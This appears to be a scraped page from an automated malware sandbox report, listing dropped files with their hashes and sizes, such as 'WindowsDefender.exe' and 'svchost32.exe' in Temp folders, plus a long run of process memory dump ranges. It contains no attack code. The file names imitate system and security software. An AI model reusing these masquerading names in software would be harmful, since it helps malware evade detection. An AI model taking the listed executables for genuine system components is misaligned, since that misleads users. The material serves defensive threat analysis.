6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe

Filesize
118KB

MD5
2b133052f5681aefb73e4dd61eb247a1

SHA1
018321bfc530e2965cf8156bbba281d2bc7be991

SHA256
2e15ceff23a09781003cd0a5b4299846dab4f81bdaaa523e3adc3967d03c4a9f

SHA512
61cfc0b36aec27ffa1a1585a544570e7c4bc72e3d603949f08b55141fe332360d1c0c81c48e587ec24f1f5b0cb0fb3e66f6f902584aa21091ef7f0853c2dc232

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a72da323274f6b653872e5acb087e81b

SHA1
e84e6793c61032219d653384b4fc3ee585c0e832

SHA256
b70a855fe6f66f0c0b7be5048a1bd8cb953431602b37b20615ced64eaa937119

SHA512
f35f730cec8273d8940cac183e4b44aa5593fbb892f703662eb7f090537ce2a81c894e37bebcd12530d7049c43b41fc5bb138af4084f53b3d2f3122b5cb3e62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3c87de2779cfb431c6ded591adfe8925

SHA1
aeee1d5b668f6f5783c155ae376e669e7f6e62f7

SHA256
fa26e076b42582205644b45fca3d79fbe4a011aec9d4da8ae31a92b372499356

SHA512
07d56bc9cf4bebf7a28e38c5b9fc2a7c9e004ce77ea7dec0a00a346178e5db69288ffb8790da85eb5d4e3b1e1336135c1e405d35d5529c3bd14207d60124545f

Download Submit
\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe

Filesize
326KB

MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
\Users\Admin\AppData\Local\Temp\UpdateChecker.exe

Filesize
463KB

MD5
4688f9213eca02fc2123cea8b446dae2

SHA1
5e7cc6dd95a2562e0e5c73faaaf698aee5e83542

SHA256
c4964f84993788df3057cd3f1859e48e360ced0a6e7405a91b34cd8c1a4a51c0

SHA512
f32ac1aba5297eacc56de1583c51df027fd879f75b90331adc3148299ad10ae83b5ca64520ad14294085b72c3c84e832a079e58d42e7aba1d308517c23017086

Download Submit
\Users\Admin\AppData\Local\Temp\WindowsDefender.exe

Filesize
418KB

MD5
34f1d89bf3956c41c59a4ca83dc427c3

SHA1
ed6af125766c122136fa20adbdf18f2e7a84e9a5

SHA256
b812ff55e49d24e0a34b564027c134ec885e99e108ab560bb8e4f1abae66357f

SHA512
77e226379d5bf8faa1960bc6c1c7c4fdc147b4ff3dbd54db79f668f2971a7164ec2cb248635d88cff82f63730614829cc35eac08b3b29a66d92d98d2cb5ad811

Download Submit
\Windows\System32\Microsoft\Telemetry\sihost32.exe

Filesize
51KB

MD5
37277e86b948998ac9bca9c9ec172458

SHA1
e6ae070ca44ef6a922d2c2be7248dc6b13195e90

SHA256
09faf09a92ee474033f4c2af231e353a8dca5ea18a30e533a4b247901b426068

SHA512
61259d20caf3fdae0ca08a92ec8b57f8e381c58fc5f80f328cf74f2d8be744fc6f574c7f3d36ef563d554d7d3a24e69d87146803033f8a3e5cc0e2737d335987

Download Submit
memory/1768-99-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/1768-88-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/1836-1-0x0000000074670000-0x0000000074C1B000-memory.dmp

Filesize
5.7MB

Download
memory/1836-22-0x0000000074670000-0x0000000074C1B000-memory.dmp

Filesize
5.7MB

Download
memory/1836-0-0x0000000074671000-0x0000000074672000-memory.dmp

Filesize
4KB

Download
memory/1836-2-0x0000000074670000-0x0000000074C1B000-memory.dmp

Filesize
5.7MB

Download
memory/2068-134-0x000000013F090000-0x000000013F0B2000-memory.dmp

Filesize
136KB

Download
memory/2068-135-0x0000000000640000-0x0000000000652000-memory.dmp

Filesize
72KB

Download
memory/2232-79-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2232-37-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2232-81-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2232-28-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2232-87-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2232-85-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2232-89-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2232-90-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2232-29-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2304-142-0x000000013FC40000-0x000000013FC52000-memory.dmp

Filesize
72KB

Download
memory/2304-143-0x0000000000140000-0x0000000000146000-memory.dmp

Filesize
24KB

Download
memory/2436-96-0x000000013F980000-0x000000013F9A2000-memory.dmp

Filesize
136KB

Download
memory/2436-97-0x0000000000860000-0x0000000000872000-memory.dmp

Filesize
72KB

Download
memory/2500-32-0x000000013FCC0000-0x000000013FD2C000-memory.dmp

Filesize
432KB

Download
memory/2500-19-0x000007FEF57B3000-0x000007FEF57B4000-memory.dmp

Filesize
4KB

Download
memory/2500-40-0x0000000000740000-0x0000000000762000-memory.dmp

Filesize
136KB

Download
memory/2500-80-0x000007FEF57B3000-0x000007FEF57B4000-memory.dmp

Filesize
4KB

Download
memory/2648-62-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download
memory/2648-61-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2692-54-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

Filesize
32KB

Download
memory/2692-53-0x000000001B820000-0x000000001BB02000-memory.dmp

Filesize
2.9MB

Download
memory/2716-41-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2716-38-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2756-33-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2756-31-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2760-106-0x0000000000540000-0x0000000000562000-memory.dmp

Filesize
136KB

Download
memory/2760-105-0x000000013F4A0000-0x000000013F50C000-memory.dmp

Filesize
432KB

Download
memory/2948-48-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2948-64-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download